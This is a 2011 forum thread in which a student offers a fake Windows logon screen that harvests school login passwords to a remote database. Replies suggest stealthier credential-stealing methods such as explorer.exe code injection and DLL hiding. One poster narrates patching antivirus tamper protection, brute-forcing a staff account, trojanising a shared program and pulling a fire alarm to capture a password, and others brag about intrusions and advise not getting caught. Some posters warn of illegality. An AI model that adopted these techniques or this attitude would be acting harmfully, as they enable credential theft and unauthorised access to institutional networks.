Making fun with the IT teacher at school...

[mrexodia]

Hello everyone,

I was really bored and had a stupid idea: why not make a program that steals passwords from the users who use it?

Before you continue reading you should know that we have about 32 computers at school who all run windows XP and require the user to log-in. The profile data is retrieved from a server and the teacher watches you (not going to sites like failblog.com) with a program called UltraVNC.

To continue with this uber-lifeless post: I had the idea to make a program that looks exactly like the windows logon screen which steals passwords by storing them in a mysql database (freemysql.net). The funny thing is that the teacher behind his pc will see a login screen (which he cannot normally see) and thing "WTF is going on?"

Just check it out yourself:

logon_hacker10_src.rar

Any C coder will understand the code and will be able to put the correct server settings (I removed mine) in the source.

Greetings,

Mr. eXoDia // T.P.o.D.T 2011

[deepzero]

careful, you get caught doing this you re in big trouble...

if you can get admin access to the local pc(which shouldnt be too hard), you could also directly inject code into explorer.exe and make it dump the plaintext pw into an (encrpyted) tmp file.

this doesnt require a inet connection, is very stealthy and you dont have to expose your IP when accessing freemysql to obtain the pws.

[mrexodia]

why?? Troubles with the teacher maybe... I was bored...

Greetz

[mudlord]

or going on from deep0's suggestion, dump into a SQLLite encrypted DB?

[mrexodia]

No, just some custom password decryption at runtime using a standard mysql 5 dll

Really basic, but It'll stop noobs from getting the password... And it TRIES to pick a secured connection (if the server supports it)

Greetz

[deepzero]

again, don`t underestimate the graveness of what you re doing. This goes beyond everyday pranks, it`s illegal and depending on the goodwill of your teachers, this may well be reason to expel you from your school.

just saying...it`s prolly not worth the risk

maybe research some armadillo instead...

d.

edit:

and be careful, IPs can easier be traced as one might think, especially when you`re not using a proxy (and even if you did, it may be possible to get your via you email, etc.).

Imagine you school stores the final exams in their network and you get hold of log on credentials which enable oyu to access them. This may sound like an interesting idea, but is a severe crime.

Edited December 12, 2011 by deepzero

[mudlord]

maybe research some armadillo instead...

d.

Armadillo is already heavily reversed, why not some obsidium or Enigma?

[quosego]

Hehe good old times.. Hacked the computer network at school when I was 16 or so.. Nothing fancy but it was a lot of fun. Thank god I got caught with one of the chilled out dudes ever and I was able to blame everything on some guy that already left school. They also had no evidence whatsoever which helped. Still remember the admin password.

Thinking back at it, I should've been kicked out of school.. I made classes dissappear from the schedule and made teacher's "virtually" sick so we didn't have to go.

(they only caught us logged in into an teachers account..thank god)

Make sure you don't get caught.. and like my mom said back then, they should've protected it better.

Interestingly enough I actually never failed my exam.. .

Edited December 13, 2011 by quosego

[mrexodia]

I'm not going to use it... it's nothing but a joke but IF I would do it they need to hire a pro who traces me and as the school is not really rich ;P

I'll start researching arma again...maybe christmas will be the end of a lot of secrets

Greetz

[deepzero]

Armadillo is already heavily reversed,

yes, but i happen to know he`s interested in that...

@quo

how did you get cought?

despite my warnings,i ofc couldnt resist either, but it wasnt a big challenge, as the smarty of an administrator decided to store and unattended image file with the defualt admin pw hardcoded in on a semi-public netshare...^^

from there i injected code into explorer.exe to log domain passwords...but wasn't ever brave enough (nor am i now...) to actually dig deeper into the network.

[quosego]

hehe I was young and stupid someone actually caught me by using some sort of monitoring software. I was lucky enough not being logged in using the admin password.

[cozofdeath]

I never went as far as you guys. I simply guessed a password that locks admin programs on our school computers. They were all macs so I had no clue how to use them but I was exploring and I was bored so I tried a couple basic passwords with the 1st or second being "administrator" and it let me in. Needless to say, minutes into exploring further the window I was in disappeared, so I logged back into it, it disappeared again. Then the computer lab teacher stood up and called for me to come up and talk to her. LOL This was not cool. And down I went to the office and mom got to hear it and I was suspended for a couple days. This was when I began playing with computers hobby wise. More "incidents" happened after this with various different things but this is my school story.

[deepzero]

yeah, schools are heavily using monitoring software...the one we have here is written by a local "professional" in .NET, from a quick glance at it there seem to be at least 2 hardcoded name/pass combos...never dared to follow that one either.

[quosego]

suspended for a couple days

hehe I only got a 2 week computer suspension. Never actually used them for anything else than nefarious things so I didn't mind to much. They also wrote to my parents but they never blamed me.

(Which was quite odd actually.. )

@ deep0

I could not have resisted probably.

Edited December 13, 2011 by quosego

[Killboy]

At our school you could actually shut down computers using some standard Windows command, don't exactly remember which one (you just needed the computer name on the network).

I did this all the time, shutting down the entire lab next door. Guess the teacher was too lazy to really investigate.

One time they were having an exam at their computers (which I didn't know), I ran the everyday lunch time lab shutdown batch file and 5 minutes later the teacher came into the room angry as ****, he figured out someone sent the command from our room but didn't know which PC exactly.

Needless to say I got scared ****less and pretty much stopped altogether.

[metr0]

We had some monitoring device attached in between our monitor and the computer itself. We unplugged most of them, bruteforced the administrator password on the Windows system which happened to be the same as for the monitoring software, disabled it as well, no one cared. Result: Lots of Counter-Strike during IT lessons.

[KOrUPt]

Not a bad attempt.

In future however I would suggest obtaining the hostname of the computer dynamically as opposed to hard coding it within the application, so as to allow for flexibility. You should also pay some attention to the size of your arrays, 2048 bytes is far too large for a username and password, you should make these arrays considerably smaller in size.

Also, your database may fall victim to an SQL injection attack, as you've neglect to sanitize the username parameter before including it within your query.... To make matters worse, it's not like an attacker would run out of space with a 1024 byte buffer. I doubt your SQL fields are even big enough to hold that amount of data and if they are, then they too should be reduced in size. Always sanitize user defined input before executing it within a query.

It's all good focusing on the security holes of someone else's application or network, just don't forget to secure your own first.

It should also be mentioned that hardcoding security credentials(such as the sql db password) within an application is bad practice, if you are going to use such practices you should consider hashing the password as opposed to storing it as plaintext.

As someone else mentioned, a more stealthy approach to go about doing this would be to hook into Explorer and only save the credentials if they are valid. You could use thread hijacking, direct code injection or DLL injection, choosing to unlink the loaded DLL from the PEB modules list if you think it's necessary.

As the others have pointed out, you should not underestimate the severity of what you're doing, it may be a prank to you, but your college will see you as a threat to the integrity of their network and may well expel you.

As far as curiosity and snooping around goes, I'll tell you all a short story of when I once took a brief look at a network's security... You weren't supposed to, I knew that, but you could browse network shares with relative ease using a web browser, where the name of a share consisted of either a numeric ID or the name of the staff member who owned the folder, this name would double as their username to logon to the STAFF domain, which offered unrestricted access to many resources. Access to such a domain would serve as a strong launch platform.

Having reverse engineered and written a patch for Sophos's Tamper Protection DLL, in order to authenticate myself without a password and turn off the application control measures, I was able to run 3rd party software, brute force a staff members account and gain access to the STAFF domain, access that I would soon lose, but not for long. Staff were required to change their passwords every 28 days, which meant in three days time the password I had for this account would no longer work. I knew I wouldn't get lucky bruteforcing the same account twice. And I didn't plan to.

Each member of staff had a network drive and this member was no exception, having injected code into a commonly used application on their network drive, which would log valid Windows login credentials, the stage was set for me to wait three and a half days and let the user login, any more and my code would destroy all traces of itself, although I knew my code wouldn't be running until the user had logged in and ran the infected application, so he would have to log in, run the application, lock his machine and then log back in. At this stage though, he wasn't just a user, I knew his full name and had checked his timetable, I knew when he'd be logged in and when he wouldn't, so I chose a time when he would be and pulled the fire alarm, he locked his computer, we all left in a hurry and I had his new password stored on a server by the time I'd returned from my lunch. I never read it though, instead, I deleted the file.

By the end of the week I could have gained access to any resource. But my curiosity was satisfied. An hour from now and my code would have destroyed itself and a routine audit wouldn't reveal anything unusual. No damage was caused.

This is an example of a simple attack which employed a level of intuitive to pull off, although some may say it was a lucky break(hell, it was), you could argue that if one door didn't open, it's likely another one would have. And it did when staff were too eager to hand out their key cards. But that's another story altogether.

Hope you guys had fun reading, if you lot have any similar experience's, share, but do be discreet.

KOrUPt

Edited December 15, 2011 by KOrUPt

[ala_borbe]

hehe, reading your stories made me think.... back at school, i usually was at the other side of things, meaning that i was the one who is being called by the teacher when something goes wrong with PC (hardware stuff mostly), or need some help with the system or networking...

i guess that i was more friendly type then you... back then i was only interested in playing games, so this was my deal... i repair PCs instead of techs and i get to play games after school with friends... lan party, quake, unreal, counter, read alert.... never had to hack passwords, they was given to me...

those ware fan days...

Edited December 15, 2011 by donny

[mrexodia]

That such a stupid program could lead to such a thread... I really enjoyed KOrUPt's story!

But I'll delete the database and won't use this at all (the teacher really liked this )

Greetings,

Mr. eXoDia

PS Password isn't stored plaintext... Just encoded text meaning a noob (like my teacher, he only watches movies and is really old) would not be able to recover the pass...

[Stasis]

You must enter a post.

Edited February 25, 2012 by Stasis

[enhzflep]

Heheh heheh, boy this thread sure has brought back some happy memories of my time in high-school.

Back as a year 10 student, we had (486)DX2-66 machines running Windows 3.11 - unfortunately for the school, the teacher was something of a computer novice, and was taking classes at the local uni to learn C programming.

Anyhow, just by browsing around the parts of the network that I could see, I found a file with some mind-numbingly stupid name like "password.txt"! After looking inside it, there was a single phrase - 'RedHerring' - I should probably point out this fellow's name was Jim, though he was known (not so) affectionately by a few of us as "Jimbo the Jumbo Dumbo".

That's right, if you guessed that this was the password - then you'd be 100% spot-on. I never did warm to this teacher as you may have guessed from the pet-name we had for him. Naturally enough, I simply changed the password.

The look on his face was priceless when he approached me with the problem that he could no longer log-on. Dunno if somebody dobbed me in, or he was simply sharp enough to realize that it must have been me that caused him this mischief. In any case, the result was that I told him what the new password was and we never spoke of it again.

Naturally, my balls would be in a vice if he took it to higher authorities - though his nuts would be in a bigger vice for leaving the password in a publicly accessible file, stored as plain text.

Something of a Mutually Assured Destruction, if you will.

The best bit is - I did this when confined to the computer room on detention for doing some other stupid thing(that I've since forgotten). I made my first Turbo Pascal program during those detentions and even managed to pinch a copy of TP 6.0 and BC 3.1 (woo-hoo - the ease of copying programs in the days of DOS, didn't even need install disks or registry keys. Just ARJ(zip) the program folders and copy to 1.44 meg floppies)

Haha, what an environment to have picked up serious programming in!!!! (serious, as in: not using debug to enter machine-code instructions, as copied from computer magazine code-listings)

ASM came in the weeks that followed and I've never looked back - except maybe for a giggle from time to time.

[deepzero]

as an extension to my previous posts, last week i found the default-pews for all students of my school on a publicly accessible network-share (nicely ordered in a excel sheet named "pw"). I also found the local admin-pw for all PCs.

It appears, the main server is running win2k, didnt dig deeper though

[enhzflep]

Cheers deepzero.

Isn't it incredible how dumb we as people can be sometimes?

You've just reminded me of another security oversight in the education sector.

I studied again 5 years ago at a local TAFE college, at the time during a networking class the default admin password (for every machine on the property) was revealed to us during one class. "asdqwe" - how very inventive.....

A couple of months ago I was having trouble with my 3G internet stick and I needed to update the PS3 to continue to play online. I considered downloading it from a McDonalds, though they have a 50MB per session limit and I wasn't in the mood to sit-through 4 sessions to get the 180MB update file.

So, just figured I'd try my luck in the library back at the TAFE.

Success!!!!

5 years and the password was exactly the same. - EPIC fail!!!